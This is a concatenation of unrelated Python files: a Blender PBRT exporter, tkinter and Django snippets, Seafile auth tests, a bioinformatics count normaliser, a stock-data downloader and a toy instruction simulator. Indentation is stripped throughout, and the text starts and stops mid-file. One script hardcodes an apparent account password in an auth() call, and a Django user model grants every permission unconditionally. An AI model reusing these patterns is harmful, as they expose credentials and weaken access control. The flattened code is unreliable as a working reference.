return "\"string "+ socket.name + "\" \""+ "material."+ str(len(data)-1)+ "\""
return ""
def Pbrt_AddTexture(socket, node, data):
tex_type = None
tex_parameter = ""
tex_name = "Texture_" + str(len(pbrt.textures))
if node.type == "TEX_IMAGE":
tex_type = "imagemap"
tex_parameter += "\"string filename\" \"textures/"+node.image.name+"\" "
if not os.path.isfile(pbrt.texture_path+node.image.name):
try:
shutil.copyfile(bpy.path.abspath(node.image.filepath), pbrt.texture_path+node.image.name)
except IOError as io_err:
os.makedirs(pbrt.texture_path)
shutil.copyfile(bpy.path.abspath(node.image.filepath), pbrt.texture_path+node.image.name)
else :
print("file already exists")
if node.type == "TEX_CHECKER":
tex_type = "checkerboard"
color1 = [node.inputs[1].default_value[0], node.inputs[1].default_value[1], node.inputs[1].default_value[2]]
color2 = [node.inputs[2].default_value[0], node.inputs[2].default_value[1], node.inputs[2].default_value[2]]
scale = node.inputs[3].default_value
tex_parameter += "\"float uscale\" ["+str(scale)+"] \"float vscale\" ["+str(scale)+"] "
tex_parameter += "\"rgb tex1\" " +str(color1)+" \"rgb tex2\" "+str(color2)+" "
texture = "Texture \""+tex_name+"\" \"spectrum\" \""+tex_type+"\" " + tex_parameter
data.append(texture)
return "\"texture "+ socket.name + "\" \"" +tex_name+ "\""
# Export Socket
def Pbrt_ExportSockets(node, data):
parameters = ""
for i in node.inputs:
if i.type == "RGBA" :
rgba = Pbrt_SocketRGBA(i)
if(len(i.links) > 0):
if i.links[0].from_node.type in ["TEX_IMAGE", "TEX_CHECKER"]:
rgba = Pbrt_AddTexture(i, i.links[0].from_node, data)
parameters += rgba
elif i.type == "INT" :
parameters += Pbrt_SocketINT(i)
elif i.type == "VALUE" :
parameters += Pbrt_SocketVALUE(i)
elif i.type == "BOOL" :
parameters += Pbrt_SocketBOOL(i)
elif i.type == "SHADER" :
parameters += Pbrt_SocketSHADER(i, data)
parameters += " "
return parameters
# Export Material in PBRT scene format
def Pbrt_ExportMaterial(pbrt_mat):
string_export = "Material \"" + pbrt_mat.pbrt_name + "\" " + Pbrt_ExportSockets(pbrt_mat, new_materials)
return string_export
def Pbrt_ExistingExportMaterial(pbrt_mat, name, data):
string_export = "MakeNamedMaterial \""+ name + "\" \"string type\" \"" + pbrt_mat.pbrt_name + "\" " + Pbrt_ExportSockets(pbrt_mat, data)
return string_export
def Pbrt_ExportMaterialAreaLight(pbrt_mat):
node_output = pbrt_mat.node_tree.nodes["Material Output"]
node = node_output.inputs["Surface"].links[0].from_node
strenght = node.inputs[1].default_value
L = node.inputs[0].default_value
string_export = "AreaLightSource \"diffuse\" \"rgb "+ node.inputs[0].name +"\" ["+ str(L[0]*strenght) + " " + str(L[1]*strenght) + " " + str(L[2]*strenght) +"]"
return string_export
def Pbrt_ExportEnvironnement(pbrt_environement):
parameters = ""
for i in pbrt_environement.inputs:
if i.type == "RGBA" :
rgba = Pbrt_SocketRGBA(i)
if(len(i.links) > 0):
tex_node = i.links[0].from_node
if tex_node.type == "TEX_ENVIRONMENT" :
print(bpy.path.basename(tex_node.image.filepath))
try:
shutil.copyfile(bpy.path.abspath(tex_node.image.filepath), pbrt.texture_path+tex_node.image.name)
except IOError as io_err:
os.makedirs(pbrt.texture_path)
shutil.copyfile(bpy.path.abspath(tex_node.image.filepath), pbrt.texture_path+tex_node.image.name)
rgba = "\"string mapname\" [ \"textures/"+ bpy.path.basename(tex_node.image.filepath) + "\" ]"
parameters += rgba
elif i.type == "INT" :
parameters += Pbrt_SocketINT(i)
elif i.type == "VALUE" :
parameters += Pbrt_SocketVALUE(i)
elif i.type == "BOOL" :
parameters += Pbrt_SocketBOOL(i)
parameters += " "
environement = "LightSource \"infinite\" " + parameters
return environement
def Pbrt_ExportLamp(node, name):
lamp_parameter = ""
if node.type == "EMISSION":
mult = node.inputs[1].default_value
color = [node.inputs[0].default_value[0] * mult, node.inputs[0].default_value[1] * mult, node.inputs[0].default_value[2] * mult]
lamp_parameter += "\"rgb "+name+"\" " + str(color)
return lamp_parameter
class PbrtMaterialNode(Node):
bl_idname = "PbrtMaterialNode"
bl_label = "Pbrt material Node"
pbrt_name = "pbrt_material"
def init(self, context):
self.outputs.new("NodeSocketShader", "BRDF")
def add_input(self, socket_type, name, default_value):
input = self.inputs.new(socket_type, name)
if default_value is not None:
input.default_value = default_value
return input
def add_ouput(self, socket_type, name):
output = self.outputs.new(socket_type, name)
return output
def draw_buttons(self, context, layout):
layout.label(text="")
def draw_label(self):
return "PbrtMaterialNode"
class PbrtAreaLightNode(PbrtMaterialNode):
bl_idname = "PbrtAreaLight"
bl_label = "PBRT Area Light Node"
pbrt_name = "area_light"
def init(self, context):
super().init(context)
self.add_input("NodeSocketColor", "L", (1.0, 1.0, 1.0, 1.0))
self.add_input("NodeSocketFloat", "Strenght", 1.0)
def draw_label(self):
return "Pbrt Areal Light"
class PbrtMatteMaterialNode(PbrtMaterialNode):
bl_idname = "PbrtMatteMaterial"
bl_label = "PBRT Matte Material Node"
pbrt_name = "matte"
def init(self, context):
super().init(context)
self.add_input("NodeSocketColor", "Kd", (1.0, 1.0, 1.0, 1.0))
self.add_input("NodeSocketFloat", "sigma", 0.0)
def draw_label(self):
return "Pbrt Matte"
class PbrtPlasticMaterialNode(PbrtMaterialNode):
bl_idname = "PbrtPlasticMaterial"
bl_label = "PBRT Plastic Material Node"
pbrt_name = "plastic"
def init(self, context):
super().init(context)
self.add_input("NodeSocketColor", "Kd", (1.0, 1.0, 1.0, 1.0))
self.add_input("NodeSocketColor", "Ks", (1.0, 1.0, 1.0, 1.0))
self.add_input("NodeSocketFloat", "roughness", 0.0)
def draw_label(self):
return "Pbrt Plastic"
class PbrtMetalMaterialNode(PbrtMaterialNode):
bl_idname = "PbrtMetalMaterial"
bl_label = "PBRT Metal Material Node"
pbrt_name = "metal"
def init(self, context):
super().init(context)
self.add_input("NodeSocketColor", "eta", (1.0, 1.0, 1.0, 1.0))
self.add_input("NodeSocketColor", "k", (1.0, 1.0, 1.0, 1.0))
self.add_input("NodeSocketFloat", "roughness", 0.0)
#self.add_input("NodeSocketFloat", "uroughness", None)
#self.add_input("NodeSocketFloat", "vroughness", None)
self.add_input("NodeSocketBool", "remaproughness", True)
def draw_label(self):
return "Pbrt Metal"
class PbrtMirrorMaterialNode(PbrtMaterialNode):
bl_idname = "PbrtMirrorMaterial"
bl_label = "PBRT Mirror Material Node"
pbrt_name = "mirror"
def init(self, context):
super().init(context)
self.add_input("NodeSocketColor", "Kr", (1.0, 1.0, 1.0, 1.0))
def draw_label(self):
return "Pbrt Mirror"
class PbrtDisneyMaterialNode(PbrtMaterialNode):
bl_idname = "PbrtDisneyMaterial"
bl_label = "PBRT Disney Material Node"
pbrt_name = "disney"
def init(self, context):
super().init(context)
self.add_input("NodeSocketColor", "color", (1.0, 1.0, 1.0, 1.0))
self.add_input("NodeSocketFloat", "anisotropic", 0.0)
self.add_input("NodeSocketFloat", "clearcoat", 0.0)
self.add_input("NodeSocketFloat", "clearcoatgloss", 1.0)
self.add_input("NodeSocketFloat", "eta", 1.5)
self.add_input("NodeSocketFloat", "metallic", 0.0)
self.add_input("NodeSocketFloat", "roughness", 0.0)
#self.add_input("NodeSocketColor", "scatterdistance", (1.0, 1.0, 1.0, 1.0))
self.add_input("NodeSocketFloat", "sheen", 0.0)
self.add_input("NodeSocketFloat", "sheentint", 0.5)
self.add_input("NodeSocketFloat", "spectrans", 0.0)
self.add_input("NodeSocketFloat", "speculartint", 0.0)
def draw_label(self):
return "Pbrt Disney"
class PbrtGlassMaterialNode(PbrtMaterialNode):
bl_idname = "PbrtGlassMaterial"
bl_label = "PBRT Glass Material Node"
pbrt_name = "glass"
def init(self, context):
super().init(context)
self.add_input("NodeSocketColor", "Kr", (1.0, 1.0, 1.0, 1.0))
self.add_input("NodeSocketColor", "Kt", (1.0, 1.0, 1.0, 1.0))
self.add_input("NodeSocketFloat", "eta", 1.5)
self.add_input("NodeSocketFloat", "uroughness", 0.0)
self.add_input("NodeSocketFloat", "vroughness", 0.0)
self.add_input("NodeSocketBool", "remaproughness", True)
def draw_label(self):
return "Pbrt Glass"
class PbrtKdsubsurfaceMaterialNode(PbrtMaterialNode):
bl_idname = "PbrtKdsubsurfaceMaterial"
bl_label = "PBRT Kdsubsurface Material Node"
pbrt_name = "kdsubsurface"
def init(self, context):
super().init(context)
self.add_input("NodeSocketColor", "Kd", (1.0, 1.0, 1.0, 1.0))
self.add_input("NodeSocketFloat", "mfp", 0.0)
self.add_input("NodeSocketFloat", "eta", 1.3)
self.add_input("NodeSocketColor", "Kr", (1.0, 1.0, 1.0, 1.0))
self.add_input("NodeSocketColor", "Kd", (1.0, 1.0, 1.0, 1.0))
self.add_input("NodeSocketFloat", "uroughness", 0.0)
self.add_input("NodeSocketFloat", "vroughness", 0.0)
self.add_input("NodeSocketBool", "remaproughness", True)
def draw_label(self):
return "Pbrt Kdsubsurface"
class PbrtSubstrateMaterialode(PbrtMaterialNode):
bl_idname = "PbrtSubstrateMaterial"
bl_label = "PBRT Substrate Material Node"
pbrt_name = "substrate"
def init(self, context):
super().init(context)
self.add_input("NodeSocketColor", "Kd", (1.0, 1.0, 1.0, 1.0))
self.add_input("NodeSocketColor", "Ks", (1.0, 1.0, 1.0, 1.0))
self.add_input("NodeSocketFloat", "uroughness", 0.0)
self.add_input("NodeSocketFloat", "vroughness", 0.0)
self.add_input("NodeSocketBool", "remaproughness", True)
def draw_label(self):
return "Pbrt Kdsubsurface"
class PbrtMixtureMaterialNode(PbrtMaterialNode):
bl_idname = "PbrtMixtureMaterial"
bl_label = "PBRT Mixure Material Node"
pbrt_name = "mix"
def init(self, context):
super().init(context)
self.add_input("NodeSocketFloat", "amount", 0.5)
self.add_input("NodeSocketShader", "namedmaterial1", None)
self.add_input("NodeSocketShader", "namedmaterial2", None)
def draw_label(self):
return "Pbrt Mixure"
class PbrtEnvironnementNode(PbrtMaterialNode):
bl_idname = "PbrtEnvironementMaterial"
bl_label = "PBRT Environement Node"
pbrt_name = "environement"
def init(self, context):
super().init(context)
self.add_input("NodeSocketColor", "L", (1.0, 1.0, 1.0, 1.0))
self.add_input("NodeSocketInt", "samples", 1)
def draw_label(self):
return "Pbrt Environement"
class PbrtNodeCategory(NodeCategory):
@classmethod
def poll(cls, context):
return context.space_data.tree_type == 'ShaderNodeTree'
identifier = 'PBRT_NODES'
node_categories = [PbrtNodeCategory(identifier, "Pbrt Material Nodes", items=[
NodeItem("PbrtMatteMaterial"),
NodeItem("PbrtPlasticMaterial"),
NodeItem("PbrtMetalMaterial"),
NodeItem("PbrtMirrorMaterial"),
NodeItem("PbrtDisneyMaterial"),
NodeItem("PbrtGlassMaterial"),
NodeItem("PbrtKdsubsurfaceMaterial"),
NodeItem("PbrtSubstrateMaterial"),
NodeItem("PbrtMixtureMaterial"),
NodeItem("PbrtEnvironementMaterial"),
NodeItem("PbrtAreaLight")
])]
classes = (
PbrtMatteMaterialNode,
PbrtPlasticMaterialNode,
PbrtMetalMaterialNode,
PbrtMirrorMaterialNode,
PbrtDisneyMaterialNode,
PbrtGlassMaterialNode,
PbrtKdsubsurfaceMaterialNode,
PbrtSubstrateMaterialode,
PbrtMixtureMaterialNode,
PbrtEnvironnementNode,
PbrtAreaLightNode
)
def register():
for cls in classes:
bpy.utils.register_class(cls)
if identifier in nodeitems_utils._node_categories:
nodeitems_utils.unregister_node_categories(identifier)
nodeitems_utils.register_node_categories(identifier, node_categories)
def unregister():
nodeitems_utils.unregister_node_categories(identifier)
for cls in classes:
bpy.utils.unregister_class(cls)
nodeitems_utils.unregister_node_categories("PBRT_MATERIAL_TREE")
|
from tkinter import *
root = Tk()
w1 =Message(root,text='这是一则消息')
w1.pack()
w2 =Message(root,text='这是一则常常常常消息')# message 自动换行 跟text一样
w2.pack()
w3 =Spinbox(root,from_=0,to=10)
w3.pack()
w4 =Spinbox(root,values=("鸭子","鸡儿","山羊"))
w4.pack()
def create():
top = Toplevel() #窗口里面弹出窗口
top.title("第二个窗口")
msg = Message(top,text="哒哒哒哒哒") #这里是text
msg.pack()
b = Button(root,text="创建顶级窗口",command=create)
b.pack()
mainloop()
|
from tcp_latency import measure_latency
import numpy as np
import threading
import time
import pickle
import matplotlib.pyplot as plt
ip_addresses = [("New York", "162.243.19.47"), ("Greater Noida", "117.55.243.14"),
("Guangzhou", "202.46.34.74"), ("Chitose, Japan", "210.228.48.238"),
("Cruseilles, France", "62.212.113.125"), ("Presidente Prudente, Brazil", "177.43.35.247"),
("United Kingdom", "88.208.211.65"), ("Australia", "1.1.1.1")]
# Produce new delays
num_tests = 1000
delays_np = np.zeros((num_tests, len(ip_addresses)+1))
pickle.dump(delays_np, open("delays.dat", "wb"))
initial_time_stamp = time.time()
pickle.dump(initial_time_stamp, open("initial_time_stamp.dat", "wb"))
for ii in range(num_tests):
initial_time_stamp = pickle.load(open("initial_time_stamp.dat", "rb"))
time_stamp = time.time()
results = [measure_latency(host=i[1], port=80, runs=1) for i in ip_addresses]
results = np.hstack((np.array([[time_stamp - initial_time_stamp]]), np.mean(np.array(results, dtype=np.float64), axis=1).reshape(1,-1)))
delays_np[ii] = results
# print("\n\n\n")
print("Test #"+str(ii+1))
# print(delays_np)
pickle.dump(delays_np, open("delays.dat", "wb"))
# Reuse existing delays
# delays_np = pickle.load(open("delays.dat", "rb"))
for i in range(len(ip_addresses)):
plt.plot(delays_np[:,0], delays_np[:,i+1], label=ip_addresses[i][0])
plt.legend()
plt.title("Delays")
plt.xlabel("Time (seconds)")
plt.ylabel("Delay (milliseconds)")
plt.show() |
from django.contrib.auth.decorators import login_required
from django.http import HttpResponse
from django.shortcuts import render
from authapp import Forms
from authapp import models
from authapp.Forms import LoginForm
from authapp.models import registers
def home(request):
return render(request,'index.html')
# def home(request):
# loginform=LoginForm(request.POST)
# if loginform.is_valid():
# un=loginform.cleaned_data['email']
# pw=loginform.cleaned_data['Password']
# user=registers.objects.filter(email=un,Password=pw)
# if not user:
# return HttpResponse('index.html')
# else:
# login(request,user)
# return render(request,'welcome.html')
# else:
# return render(request,'index.html')
#
# @login_required
# def login(request):
# return render(request, "welcome.html")
# def my_logout(request):
# logout(request)
# return render(request,'index.html')
|
from django.db import models
from base.models import BaseModel
from django.contrib.auth.models import AbstractBaseUser, AbstractUser, BaseUserManager
class UserManager(BaseUserManager):
def create_simple_user(self, **kwargs):
"""
Creates a user object.
Returns:
User obj -- the method returns the user object
"""
user = self.create_user(kwargs.get('email'),
password=kwargs.get('password'))
user.first_name = kwargs.get('first_name')
user.last_name = kwargs.get('last_name')
user.phone_number = kwargs.get('phone_number')
user.status = kwargs.get('status')
user.sex = kwargs.get("sex")
user.activity = [kwargs.get('activity', None)]
user.save()
return user
def create_user(self, email, password=None, **extra_fields):
"""
Creates and saves a User with the given email and password.
"""
if not email:
raise ValueError('Users must have an email address')
user = self.model(email=self.normalize_email(email), )
user.set_password(password)
user.save()
return user
def create_staffuser(self, email, password):
"""
Creates and saves a staff user with the given email and password.
"""
user = self.create_user(
email,
password=password,
)
user.staff = True
user.save()
return user
def create_superuser(self, email, password):
"""
Creates and saves a superuser with the given email and password.
"""
user = self.create_user(
email,
password=password,
)
user.staff = True
user.admin = True
user.save()
return user
class User(AbstractBaseUser, BaseModel):
ACTIVE = 'active'
INACTIVE = 'inactive'
USER_ROLES = (
(ACTIVE, ACTIVE),
(INACTIVE, INACTIVE),
)
email = models.EmailField(unique=True, blank=False)
objects = UserManager()
has_logged_in_before = models.BooleanField(default=False)
staff = models.BooleanField(default=False)
admin = models.BooleanField(default=False)
is_deleted = models.BooleanField(default=False)
status = models.CharField(max_length=200, choices=USER_ROLES, default=ACTIVE)
phone = models.CharField(max_length=18, null=True, blank=True)
address = models.TextField(null=True, blank=True)
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = []
class Meta:
verbose_name = ('user')
verbose_name_plural = ('users')
def has_perm(self, perm, obj=None):
"Does the user have a specific permission?"
# Simplest possible answer: Yes, always
return True
def has_module_perms(self, app_label):
"Does the user have permissions to view the app `app_label`?"
# Simplest possible answer: Yes, always
return True
@property
def full_name(self):
return f'{self.first_name.capitalize()} {self.last_name.capitalize()}'
@property
def is_staff(self):
"Is the user a member of staff?"
return self.staff
@property
def is_admin(self):
"Is the user a admin member?"
return self.admin
def __str__(self):
return "{}".format(self.email)
|
#coding: UTF-8
"""
Test auth related api, such as login/logout.
"""
import random
import re
from urllib import urlencode, quote
from tests.common.common import USERNAME, PASSWORD, SEAFILE_BASE_URL
from tests.common.utils import randstring, urljoin
from tests.api.urls import (
AUTH_PING_URL, TOKEN_URL, DOWNLOAD_REPO_URL, LOGOUT_DEVICE_URL
)
from tests.api.apitestbase import ApiTestBase
def fake_ccnet_id():
return randstring(length=40)
class AuthTest(ApiTestBase):
"""This tests involves creating/deleting api tokens, so for this test we
use a specific auth token so that it won't affect other test cases.
"""
def test_auth_token_missing(self):
return self.get(AUTH_PING_URL, token=None, use_token=False,
expected=403)
def test_auth_token_is_empty(self):
return self.get(AUTH_PING_URL, token='', expected=401)
def test_auth_token_contains_space(self):
return self.get(AUTH_PING_URL, token='token with space', expected=401)
def test_random_auth_token(self):
return self.get(AUTH_PING_URL, token='randomtoken', expected=401)
def test_logout_device(self):
token = self._desktop_login()
self._do_auth_ping(token, expected=200)
with self.get_tmp_repo() as repo:
sync_token = self._clone_repo(token, repo.repo_id)
self._get_repo_info(sync_token, repo.repo_id)
self._logout(token)
self._do_auth_ping(token, expected=401)
# self._get_repo_info(sync_token, repo.repo_id, expected=400)
def _desktop_login(self):
data = {
'username': USERNAME,
'password': PASSWORD,
'platform': 'windows',
'device_id': fake_ccnet_id(),
'device_name': 'fake-device-name',
'client_version': '4.1.0',
'platform_version': '',
}
return self.post(TOKEN_URL, data=data, use_token=False).json()['token']
def _do_auth_ping(self, token, **kwargs):
return self.get(AUTH_PING_URL, token=token, **kwargs)
def _clone_repo(self, token, repo_id):
return self.get(DOWNLOAD_REPO_URL % repo_id, token=token).json()['token']
def _get_repo_info(self, sync_token, repo_id, **kwargs):
headers = {
'Seafile-Repo-Token': sync_token
}
url = urljoin(SEAFILE_BASE_URL,
'repo/%s/permission-check/?op=upload' % repo_id)
self.get(url, use_token=False, headers=headers, **kwargs)
def _logout(self, token):
self.post(LOGOUT_DEVICE_URL, token=token)
|
# ========================================================================= #
# Logtistic Regression #
# Input: (36x36 + 1 Bias) *5 Classes = 1296
# Softmax Output = 5 Probabilities
# parameters = 3485
# About 40% Accuracy #
# ========================================================================= #
import tensorflow as tf
import matplotlib.pyplot as plt
import numpy as np
|
#Tessa Pierce
#2.8.13
#Normalize counts in the count matrix exported by remove_low_counts.py
#count matrix: contig \t sd2c \t sd3c \t br1c \t br2c \t ab1c \t ab2c \t scn1c \t scn2c \t pes1c \t pes2c \t bb1c \t bb2c \n
##RPKM = reads per kilobase per million mapped reads
import sys
#import numpy as np
from optparse import OptionParser
desc = """ This is a script that reads in a count table for the six populations and normalizes the counts by the lengths of the contigs relative to the SD length.
"""
parser = OptionParser(description = desc)
### Contig Name Conversion Table ###
parser.add_option("--counts", "--inCountsTable", help = "name of the input counts file", action = "store", type = "string", dest="counts")
parser.add_option("--cnv", "--Conversion", help = "name of the Contig Conversion table", action="store", type="string", dest="conversion")
### Output File ###
parser.add_option("--out", "--OutCountsTable", help = "name of the Output Counts Table File" , action="store", type="string", dest="out")
# Directory for Counts files and Output file #
parser.add_option("--dir", "--Directory", help = "path to all input files" , action="store", type="string", dest="path")
########input number of files for each population
parser.add_option("--sd", "--numSanDiego", help = "number san diego columns", action="store", type="int", dest="sd")
parser.add_option("--scn", "--numSantaCruz", help = "number of santa cruz columns", action="store", type="int", dest="scn")
parser.add_option("--pes", "--numPescadero", help = "number of pescadero columns", action="store", type="int", dest="pes")
parser.add_option("--bb", "--numBodegaBay", help = "number of bodega bay columns", action="store", type="int", dest="bb")
parser.add_option("--ab", "--numAbaloneCove", help = "number of abalone cove columns", action="store", type="int", dest="ab")
parser.add_option("--br", "--numBirdRock", help = "number of bird rock columns", action="store", type="int", dest="br")
(opts, args) = parser.parse_args()
inCounts = open(opts.counts, 'r')
conversionFile = open(opts.conversion, 'r') #same conversion table used to convert the contig names
outNorm = open(opts.out, 'w')
counts_per_sd_contig = [ x.strip().split('\t') for x in inCounts.readlines() ]
conversionTable = [ x.strip().split('\t') for x in conversionFile.readlines() ]
#functions
def createLengthConversionDt(conversion, columns):
lengthDt = {}
for line in conversion:
contig = 'SD' + line[0]
sdLen = line[1]
brLen = line[3]
abLen = line[5]
scnLen = line[7]
pesLen = line[9]
bbLen = line[11]
lenList = [] # need to iterate through column list, if has sd = sd Len, etc
for col in columns:
if col == "sd":
lenList.append(sdLen)
elif col == "br":
lenList.append(brLen)
elif col == "ab":
lenList.append(abLen)
elif col == "scn":
lenList.append(scnLen)
elif col == "pes":
lenList.append(pesLen)
elif col == "bb":
lenList.append(bbLen)
lengthDt[contig] = lenList #dynamically maps to the # of files you used for each population (input those numbers in the options above)
return lengthDt
def mapPopsToColumns(colsToAdd, popName, cols):
i = 0
popName = str(popName)
while i < colsToAdd:
cols.append(popName)
i = i + 1
return cols
def normalizeCounts(inCounts, lengthConversion):
normDt = {}
for line in inCounts:
contigName = line[0]
contigLengths = lengthConversion.get(contigName)
contigLengths = [float(item) for item in contigLengths]
counts = line[1:] # get all counts
counts = [float(list_item) for list_item in counts]
counts_per_bp =[a/b for a,b in zip(counts,contigLengths)] #divide each count by it's population's reference contig length
RPK = [x*1000 for x in counts_per_bp] # multiply each of these length-normalized counts by 1000 .. or [x for x in counts_per_bp] if don't want to multiply
normDt[contigName] = RPK
return normDt
#main
#map populations back to the columns
columnList = mapPopsToColumns(opts.sd, "sd", [])
columnList = mapPopsToColumns(opts.br, "br", columnList)
columnList = mapPopsToColumns(opts.ab, "ab", columnList)
columnList = mapPopsToColumns(opts.scn, "scn", columnList)
columnList = mapPopsToColumns(opts.pes, "pes", columnList)
columnList = mapPopsToColumns(opts.bb, "bb", columnList)
lengthConversionDt = createLengthConversionDt(conversionTable, columnList)
headerLine = counts_per_sd_contig[0]
#create RPK dictionary of normalized counts
RPK_Dt = normalizeCounts(counts_per_sd_contig[1:], lengthConversionDt)
# write out header line
outNorm.write('\t'.join(headerLine) + '\n')
# write out normalized (RPK) counts
for key, val in RPK_Dt.items():
outNorm.write(key + '\t' + '\t'.join(map(str,val)) + '\n')
inCounts.close()
conversionFile.close()
outNorm.close()
sys.exit()
|
#-*-coding:utf-8 -*-
__author__ = 'Administrator'
from jqdatasdk import *
import pandas as pd
from jqdatasdk import *
import os
from datetime import datetime,timedelta
#授权
auth('13811866763',"sam155")
'''
一次性获取聚宽的财务数据,包括balance,case_flow,income,indicator表
目录在finance文件下,各子文件为'valuation', 'balance', 'cash_flow', 'income', 'indicator'
完全跑受到聚宽数据当天只能查询200w条记录的限制
'''
table_name = ['valuation', 'balance', 'cash_flow', 'income', 'indicator']
#update数据的文件夹路径
valuation_file_path = "C:\\quanttime\\data\\finance\\valuation\\"
balance_file_path = "C:\\quanttime\\data\\finance\\balance\\"
cash_flow_file_path = "C:\\quanttime\\data\\finance\\cash_flow\\"
income_file_path = "C:\\quanttime\\data\\finance\\income\\"
indicator_file_path = "C:\\quanttime\\data\\finance\\indicator\\"
#获取所有stock信息
stock_info = pd.read_csv("C:\\quanttime\\data\\basic_info\\all_stock_info.csv",encoding='gbk')
statdate=["2006q1","2006q2","2006q3","2006q4","2006", \
"2007q1","2007q2","2007q3","2007q4","2007", \
"2008q1","2008q2","2008q3","2008q4","2008", \
"2009q1","2009q2","2009q3","2009q4","2009", \
"2010q1","2010q2","2010q3","2010q4","2010", \
"2011q1","2011q2","2011q3","2011q4","2011", \
"2012q1","2012q2","2012q3","2012q4","2012", \
"2013q1","2013q2","2013q3","2013q4","2013", \
"2014q1","2014q2","2014q3","2014q4","2014", \
"2015q1","2015q2","2015q3","2015q4","2015", \
"2016q1","2016q2","2016q3","2016q4","2016", \
"2017q1","2017q2","2017q3","2017q4","2017", \
"2018q1","2018q2","2018q3","2018q4","2018"]
#获取balance表
for i in range(0,len(stock_info)):
filepath = balance_file_path + str(stock_info.iloc[i,0]) + ".csv"
q = query(balance).filter(balance.code == stock_info.iloc[i,0])
df_balance = get_fundamentals(q,statDate = "2006q1")
for date in statdate:
tmp = get_fundamentals(q,statDate=date)
df_balance = pd.concat([df_balance,tmp])
df_balance.to_csv(filepath)
print("get balance code:%r successful"%(stock_info.iloc[i,0]))
#获取cash_flow表
for i in range(0,len(stock_info)):
filepath = cash_flow_file_path + str(stock_info.iloc[i,0]) + ".csv"
q = query(cash_flow).filter(cash_flow.code==stock_info.iloc[i,0])
df_cash = get_fundamentals(q, statDate = "2006q1")
for date in statdate:
tmp = get_fundamentals(q,statDate=date)
df_cash = pd.concat([df_cash,tmp])
df_cash.to_csv(filepath)
print("get cash flow code:%r successful"%(stock_info.iloc[i,0]))
#获取income表
for i in range(0,len(stock_info)):
filepath = income_file_path + str(stock_info.iloc[i,0]) + ".csv"
q = query(income).filter(income.code==stock_info.iloc[i,0])
df_income = get_fundamentals(q, statDate = "2006q1")
for date in statdate:
tmp = get_fundamentals(q,statDate=date)
df_income = pd.concat([df_income,tmp])
df_income.to_csv(filepath)
print("get income code:%r successful"%(stock_info.iloc[i,0]))
#获取indicator表
for i in range(0,len(stock_info)):
filepath = indicator_file_path + str(stock_info.iloc[i,0]) + ".csv"
q = query(indicator).filter(indicator.code==stock_info.iloc[i,0])
df_indicator = get_fundamentals(q, statDate = "2006q1")
for date in statdate:
tmp = get_fundamentals(q,statDate=date)
df_indicator = pd.concat([df_indicator,tmp])
df_indicator.to_csv(filepath)
print("get indicator code:%r successful"%(stock_info.iloc[i,0])) |
#Reverse string
s1=raw_input("Enter a String : ")
s1=s1+" "
s2=" "
print "reverse string is =",
for i in range(len(s1)-1,-1,-1):
k=s1[i]
print k,
|
x = int(input())
z = int(input())
cont = 0
while cont < 1:
if z <= x:
z = int(input())
else:
cont += 1
soma = 0
cont2 = 0
cont3 = 0
while cont2 < 1:
soma = soma + x
if soma > z:
cont2 += 1
cont3 += 1
x += 1
print(cont3)
|
class PretrainedConfig(object):
pretrained_config_archive_map = {} # type: Dict[str, str]
model_type = "" # type: str
def __init__(self, **kwargs):
pass
|
with open("CW2016_03.in", "r") as f:
line = f.readline()
count = int(line)
for i in range(count):
word = f.readline().strip()
prev = word[0]
likes = False
for char in word[1:]:
if prev == char:
likes = True
prev = char
if likes:
print("likes ", word)
else:
print("hates ", word)
|
def saveJumpLabel(asm, labelIndex, labelName, labelAddr):
lineCount = 0
for line in asm:
line = line.replace(" ", "")
if (line.count(":")):
labelName.append(line[0:line.index(":")]) # append the label name
labelIndex.append(lineCount) # append the label's index\
labelAddr.append(lineCount * 4)
# asm[lineCount] = line[line.index(":")+1:]
lineCount += 1
for item in range(asm.count('\n')): # Remove all empty lines '\n'
asm.remove('\n')
#setting ip registers
def regNameInit(regName):
i = 0
while (i <= 4):
regName.append(str(i))
i = i + 1
regName.append('lo')
regName.append('hi')
#created list to read non empty and un commented lines
def splitText(text):
return text.split("\n")
def readIn(s):
text = ""
with open(s, "r") as f:
for line in f:
if (line != "\n" and line[0]!='#'):
text += line
return text
def main():
# starting with 259 spots in MEM
MEM = [0] * 259
regName = []
PC = 0
DIC = 0
regNameInit(regName)
regval = [0] * 7 # 0-3, A, lo and hi
LO = 4
HI = 5
A = 6
regval[A] = 1
good_in = False
mem_addr = 0x0004
#op code declarations
initlo = "00"
inithi = "10" # has to be checked before ld and st(last ones)
xor = "0010"
sinc2b = "0011"
addu = "0110"
and1 = "1000"
srl = "1010"
Fold = "1101"
sub = "1111"
Hash_branch = "1110"
LA = "0000"
pat_Count = "0101"
#bit of UI
while (good_in == False):
file_Name = input("Please type file name, enter for default, or q to quit:\n")
if (file_Name == "q"):
print("Bye!")
return
if (file_Name == ""):
file_Name = "FA_mc.txt"
try:
f = open(file_Name)
f.close()
good_in = True
except FileNotFoundError:
print('File does not exist')
f = open("output.txt", "w+")
text = readIn(file_Name)
t = splitText(text)
lineCount = 0
while (lineCount < len(t)):
line = t[lineCount]
#starting to print to output.txt
f.write('------------------------------ \n')
if (not (':' in line)):
f.write('MIPS Instruction: ' + line + '\n')
if(line[0:4] == srl):
DIC += 1
# XXXXSSTT
#always to $3
PC += 4
RT = regval[int(line[6:8], 2)]
regval[3] = regval[int(line[4:6],2)] >> RT
f.write('Operation: $' + str(int(line[6:8],2)) + ' = ' + str(regval[int(line[6:8],2)]) + '; ' + '\n')
f.write('PC is now at ' + str(PC) + '\n')
f.write('DIC is now at '+str(DIC))
#this branch does pattern count by using 4 different
#if statements, it was implemented in hardware using Muxes
elif(line[0:4] == pat_Count):
DIC += 1
PC += 4
pattern = regval[int(line[6:8],2)]
if(pattern == 0):
MEM[0] += 1
y = 0
elif(pattern == 1):
MEM[1] += 1
y = 1
elif(pattern == 2):
MEM[2] += 1
y = 2
elif(pattern == 3):
MEM[3] += 1
y = 3
f.write('Operation: MEM[+'+str(y)+'] = ' + str(regval[int(line[6:8],2)]) + '\n')
f.write('PC is now at ' + str(PC) + '\n')
f.write('DIC is now at '+str(DIC))
elif (line[0:4] == sinc2b):
DIC += 1
PC += 4
X = regval[int(line[6:8],2)]
MEM[mem_addr] = X
mem_addr += 1
f.write('Operation: MEM[$' + str(mem_addr-1) + '] = ' + str(regval[int(line[6:8],2)]) + '; ' + '\n')
f.write('PC is now at ' + str(PC) + '\n')
f.write('DIC is now at '+str(DIC))
#This instuction will load the unaddressable register A into an addressable register
elif(line[0:4] == LA):
DIC += 1
PC += 4
regval[int(line[6:8],2)] = regval[A]
